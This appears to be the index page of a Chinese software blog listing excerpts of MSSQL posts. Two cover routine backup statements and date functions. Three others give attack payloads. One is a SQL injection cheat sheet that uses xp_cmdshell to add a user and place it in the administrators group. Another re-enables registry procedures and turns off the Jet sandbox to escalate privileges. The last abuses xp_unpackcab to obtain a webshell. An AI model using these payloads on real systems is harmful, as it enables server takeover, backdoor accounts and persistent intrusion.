兔八哥极品软件园    运行: 3108天 | 文章:601 篇 | 评论:525 条 | 碎语:1条

MSSQL2005数据库备份语句

作者:admin 发布于:2013-3-15 14:32 Friday 分类:MSSQL

--完整备份
Backup Database NorthwindCS
To disk='G:\Backup\NorthwindCS_Full_20070908.bak'

--差异备份
Backup Database NorthwindCS
To disk='G:\Backup\NorthwindCS_Diff_20070908.bak'
With Differential

--日志备份,默认截断日志
Backup Log NorthwindCS
To disk='G:\Backup\NorthwindCS_Log_20070908.bak'

--日志备份,不截断日志
Backup Log NorthwindCS
To disk='G:\Backup\No...

阅读全文>>

标签: mssql

评论(0) 引用(102) 浏览(46999)

MSSQL日期相加减比大小函数使用示例

作者:admin 发布于:2012-10-12 8:22 Friday 分类:MSSQL

1. 当前系统日期、时间
select getdate()


2. dateadd 在向指定日期加上一段时间的基础上,返回新的 datetime 值
例如:向日期加上2天
select dateadd(day,2,'2004-10-15') --返回:2004-10-17 00:00:00.000

3. datediff 返回跨两个指定日期的日期和时间边界数。
select datediff(day,'2004-09-01','2004-09-18') --返回:17

4. datepart 返回代表指定日期的指定日期部分的整数。
SELECT DATEPART(month, '2004-10-15') --返回 10

5. datename 返回代表指定日期的指定日期部分...

阅读全文>>

标签: mssql

评论(0) 引用(73) 浏览(45999)

mssql注入常用命令

作者:admin 发布于:2012-9-13 12:31 Thursday 分类:网络转载

①、是否存在xp_cmdshell

and 1=(select count(*) from master.dbo.sysobjects where xtype = 'x' and name = 'xp_cmdshell')

②、用xp_cmdshell执行命令

;exec master..xp_cmdshell "net user name password /add"--
;exec master..xp_cmdshell "net localgroup name administrators /add"-- 

③、查看权限

and (select IS_SRVROLEMEMBER('sysadmin'))=1--  //sa
and (select ...

阅读全文>>

标签: mssql

评论(0) 引用(61) 浏览(30784)

MSSQL沙盒提权测试

作者:admin 发布于:2012-3-12 16:56 Monday 分类:MSSQL

如果扩展被删除,先恢复对注册表的读写存储。

dbcc addextendedproc ('xp_regread','xpstar.dll')

dbcc addextendedproc ('xp_regwrite','xpstar.dll')

修复沙盒的保护模式

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftJet4.0Engines','SandBoxMode','REG_DWORD',0;--

  查看'SandBoxMode'值是否已经变成0了。

exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftJet4.0Engines', 'SandBoxMode'

调用沙盒模式

select *...

阅读全文>>

标签: mssql 沙盒 提权

评论(0) 引用(51) 浏览(52043)

利用MSSQL扩展来获取WEBSHELL

作者:admin 发布于:2012-3-12 16:52 Monday 分类:MSSQL

EXEC [master].[dbo].[xp_makecab] 'c:\test.rar','default',1,'d:\cmd.asp'

打包

EXEC [master].[dbo].[xp_unpackcab] 'C:\test.rar','c:',1, 'n.asp'

解包,可以用于得到webshell

EXEC [master].[dbo].[xp_readerrorlog] 1,'d:\cmd.asp'

读文本代码


要求权限:

master的dbo权限

 

持续收集其他扩展...

阅读全文>>

标签: webshell exec mssql

评论(0) 引用(48) 浏览(49376)


Powered by 兔八哥极品软件 苏ICP备12049267号 sitemap